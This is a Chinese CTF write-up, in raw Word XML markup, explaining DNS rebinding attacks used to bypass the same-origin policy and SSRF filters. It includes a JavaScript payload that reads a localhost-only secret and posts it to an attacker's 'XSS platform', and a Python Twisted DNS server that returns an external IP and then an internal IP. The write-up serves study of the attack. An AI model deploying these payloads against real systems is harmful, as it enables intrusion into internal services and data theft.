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一般来说浏览器通过向DNS服务器发送请求将用户输入的域名转换为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地址，然后向对应的IP地址请求资源，最后</w:t>
      </w:r>
      <w:proofErr w:type="gram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回显给用户</w:t>
      </w:r>
      <w:proofErr w:type="gram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这是一般过程。在说DNS rebinding之前先说下TTL的概念。TTL表示DNS里面域名和IP绑定关系的Cache在DNS上存活的最长时间。即请求了域名与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的关系后，请求方会缓存这个关系，缓存保持的时间就是TTL。而缓存失效后就会删除，这时候如果重新访问域名指定的IP的话会重新建立匹配关系及cache。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而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dns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就是利用这个来实现的。当用户第一次访问，解析域名获取一个IP地址；然后，域名持有者修改通过某种方式对应的IP地址；用户再次请求该域名，就会获取一个新的IP地址。对于浏览器来说，整个过程访问的都是同一域名，所以认为是安全的。这就造成了DNS Rebinding攻击。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dns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rebinding被广泛用于bypass同源策略，绕过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ssrf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的过滤等等。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实现方式有几种，原理都差不多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179A">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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8"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>实现方法</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>：特定域名实现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这种方式针对的某些特定的域名，现在国内购买的域名大都无法直接将TTL设置为0，例如我的阿里云的域名，最小的TTL是10分钟。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而某些国外的域名可以设置TTL=0。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举个例子，0ctF2016的monkey题目。当时就是通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> rebinding</w:t>
      </w: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绕过过滤的。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大概过程是这样子的。你能向服务器提交一个URL,并且服务器会访问你提交的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url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然后flag藏在服务器的本身的</w:t>
      </w:r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http://127.0.0.1/secret</w:t>
      </w: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上。只能本地访问。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但是这里你提交你能控制的页面</w:t>
      </w:r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www.x.com/index.php</w:t>
      </w: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，但是由于同源策略的原因你没办法去获取服务器上的</w:t>
      </w:r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http://127.0.0.1/secret</w:t>
      </w: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。 但是通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> rebinding</w:t>
      </w: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就可以了。 比如你的页面如下：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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spell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=</w:t>
      </w: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http://*********/static/jquery.min.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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&gt;&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>script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&gt;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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>script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&gt;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setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spell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("</w:t>
      </w:r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POST(</w:t>
      </w:r>
      <w:proofErr w:type="gram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)",90000)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function </w:t>
      </w:r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POST(</w:t>
      </w:r>
      <w:proofErr w:type="gram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){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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gram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);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$.ajax</w:t>
      </w:r>
      <w:proofErr w:type="gram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({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url:"http://www.x.com/secret",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type:"GET</w:t>
      </w:r>
      <w:proofErr w:type="spell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",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success: function(data</w:t>
      </w:r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){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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$.post("http://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你的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xss</w:t>
      </w:r>
      <w:proofErr w:type="spell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平台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",{'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a':data</w:t>
      </w:r>
      <w:proofErr w:type="spell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})}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}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);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}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&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>script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&gt;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整个过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179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1.你提交的是</w:t>
      </w:r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www.x.com/index.php</w:t>
      </w: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，内容如上述代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179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2.设置你的域名的TTL=0，提交之后服务器会请求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dns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的域名与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的关系然后找到你的这个页面，然后开始执行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js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</w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179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3.执行的时候先延迟90s，利用这延迟的90s，去修改你域名的A记录绑定到127.0.0.1上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179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4.然后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js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延迟结束</w:t>
      </w:r>
      <w:proofErr w:type="gram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之后之后</w:t>
      </w:r>
      <w:proofErr w:type="gram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又会请求</w:t>
      </w:r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http://www.x.com/secret</w:t>
      </w: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，由于你之前设置的TTL=0，所以又会重新向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dns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服务器请求一次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。得到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=127.0.0.1，而整个过程访问的都是同一域名，所以浏览器认为是安全的。就会成功去访问</w:t>
      </w:r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http://127.0.0.1/secret</w:t>
      </w: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，从而绕过同源策略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当时做这个题目的时候借助就是别人的国外域名。可以直接设置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dns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的TTL=0。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(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ps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:过程简略，只是说明原理并非详细完整的题解，中间例如端口号省略了，若是不理解</w:t>
      </w:r>
      <w:proofErr w:type="gram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可以谷歌详细</w:t>
      </w:r>
      <w:proofErr w:type="gram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的WP) 但是国内的域名都没办法怎么办？不能专门为了做题买个国外的域名把？别</w:t>
      </w:r>
      <w:proofErr w:type="gram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急继续</w:t>
      </w:r>
      <w:proofErr w:type="gram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看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179A">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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8"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>实现方法二：简单粗暴的两条A记录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具体姿势可以看看</w:t>
      </w:r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33C3 CTF</w:t>
      </w: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的</w:t>
      </w:r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list0r</w:t>
      </w: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这个题，传送门：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://bendawang.site/article/33c3-CTF-web-WriteUp" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w: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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>33c3-CTF-web-WriteUp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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这个题最后的方法就是利用DNS重绑定。 简单的说就是已知服务器会向DNS服务器发送两次解析请求。 我们最后一步的目的就是要让第一次解析出来是个外网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，第二次解析出来是个内网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所以我采用的方法是这样：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00D6179A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>
            <wp:extent cx="7388254" cy="595217"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="http://www.bendawang.site/images/586e317cb6a56d376200000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endawang.site/images/586e317cb6a56d376200000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5520" cy="6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同一个域名绑定两条A记录。这样解析是随机的。 (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ps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:同时绑定两条A记录，在请求解析的时候并不一定交替返回)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去撞1/4的概率，即当服务器第一次解析出来是个外网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，第二次解析出来是个内网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的时候就有flag了。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当然一看这样的概率那么也就意味着这不是一个好的办法了。 好的办法一定要百分</w:t>
      </w:r>
      <w:proofErr w:type="gram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百成功</w:t>
      </w:r>
      <w:proofErr w:type="gram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啊。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179A">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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8"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>实现方法三：自建DNS服务器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终于来到最完美的方法，其实前面扯了那么多还是懒，譬如第二种方法，简单到疯狂提交</w:t>
      </w:r>
      <w:proofErr w:type="gram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撞</w:t>
      </w:r>
      <w:proofErr w:type="gram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概率就行了。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但是某些情况下不行，譬如这次的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cuit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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校赛</w:t>
      </w:r>
      <w:proofErr w:type="gram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lemon师傅出的300分的短域名工具这个题目。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最后要提交四条链接，如果按照上述的方法，每一次都是1/4的概率，那么(1/4)的4次方就</w:t>
      </w:r>
      <w:proofErr w:type="gram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不</w:t>
      </w:r>
      <w:proofErr w:type="gram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用做题了。。。XD。。。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所以我们需要自建DNS服务器，让它第一次请求解析记录的时候我们给他返回外网，第二次请求解析记录的时候返回一个内网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。 具体的题解去看lemon师傅的博客，传送门：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/iamstudy/articles/13th_cuit_game_wp_web300_ssrf.html" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w: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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>短域名工具wp及出题心得</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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说道自建服务器的步骤如下： 需要先添加一条ns记录和一条a记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A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>
            <wp:extent cx="14878050" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="5" name="图片 5" descr="http://www.bendawang.site/images/592e158ef610c2492a000000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bendawang.site/images/592e158ef610c2492a000000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ns记录表示域名</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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test.bendawang.site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这个子域名指定由</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ns.bendawang.site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这个域名服务器来解析，然后a记录表示我的这个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ns.bendawang.site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的位置在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地址</w:t>
      </w:r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104.160.43.154</w:t>
      </w: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上。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这样我们就可以在这个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip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上搭建一个服务器就行了。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这里搭建DNS服务器采用python的twisted库中的name模块，代码如下：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twisted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internet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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import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reactor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defer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from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twisted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names</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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import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client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dns</w:t>
      </w:r>
      <w:proofErr w:type="spell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error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server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record</w:t>
      </w:r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=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{</w:t>
      </w:r>
      <w:proofErr w:type="gram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}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class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DynamicResolver</w:t>
      </w:r>
      <w:proofErr w:type="spell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object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):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proofErr w:type="spellStart"/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def</w:t>
      </w:r>
      <w:proofErr w:type="spell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r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B58900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B58900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doDynamicResponse</w:t>
      </w:r>
      <w:proofErr w:type="spell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proofErr w:type="gram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self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query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):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name = query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name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name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name not </w:t>
      </w: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in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record or record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name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]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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1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: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ip</w:t>
      </w:r>
      <w:proofErr w:type="spell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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"104.160.43.154"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else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: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ip</w:t>
      </w:r>
      <w:proofErr w:type="spell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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"171.18.0.2"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if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name not </w:t>
      </w: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in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record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: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            record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name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]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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0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record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name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]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+=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1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print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name+</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" ===&gt; "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+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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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answer = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dns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RRHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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name=name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type=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dns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A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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cls</w:t>
      </w:r>
      <w:proofErr w:type="spell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=dns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IN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ttl</w:t>
      </w:r>
      <w:proofErr w:type="spell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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0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    payload=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dns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Record</w:t>
      </w:r>
      <w:proofErr w:type="gram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_A</w:t>
      </w:r>
      <w:proofErr w:type="spell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address=b</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'%s'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%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ip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ttl</w:t>
      </w:r>
      <w:proofErr w:type="spell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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0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answers = 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answer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]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authority = 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[]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additional = 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[]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answers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authority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additional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proofErr w:type="spellStart"/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def</w:t>
      </w:r>
      <w:proofErr w:type="spell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gramStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B58900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query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proofErr w:type="gram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self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query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timeout=None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):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</w:t>
      </w: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return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defer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succeed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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self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_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doDynamicResponse</w:t>
      </w:r>
      <w:proofErr w:type="spell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query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))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spellStart"/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def</w:t>
      </w:r>
      <w:proofErr w:type="spell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gramStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B58900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main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proofErr w:type="gram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):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factory = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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server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DNSServerFactory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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    clients=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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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DynamicResolver</w:t>
      </w:r>
      <w:proofErr w:type="spell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proofErr w:type="gram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),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client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Resolver</w:t>
      </w:r>
      <w:proofErr w:type="spell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resolv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>resolv.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'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)]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protocol = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dns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DNSDatagramProtocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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controller=factory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proofErr w:type="spellStart"/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reactor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listenUDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="268BD2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>53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,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protocol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proofErr w:type="spellStart"/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reactor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.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run</w:t>
      </w:r>
      <w:proofErr w:type="spell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proofErr w:type="gram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lastRenderedPageBreak/>
        <w:t>if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__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'__main__'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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6179A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="859900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>raise</w:t>
      </w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spell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SystemExit</w:t>
      </w:r>
      <w:proofErr w:type="spell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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="657B83"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t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直接root权限运行就可以了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6179A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>
            <wp:extent cx="5981700" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="http://www.bendawang.site/images/592e16ecf610c2492a00000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endawang.site/images/592e16ecf610c2492a00000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9A" w:rsidRPr="00D6179A" w:rsidRDefault="00D6179A" w:rsidP="00D6179A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然后自己尝试</w:t>
      </w:r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 xml:space="preserve">dig </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6179A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test.bendawang.site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6179A">
        <w:rPr>
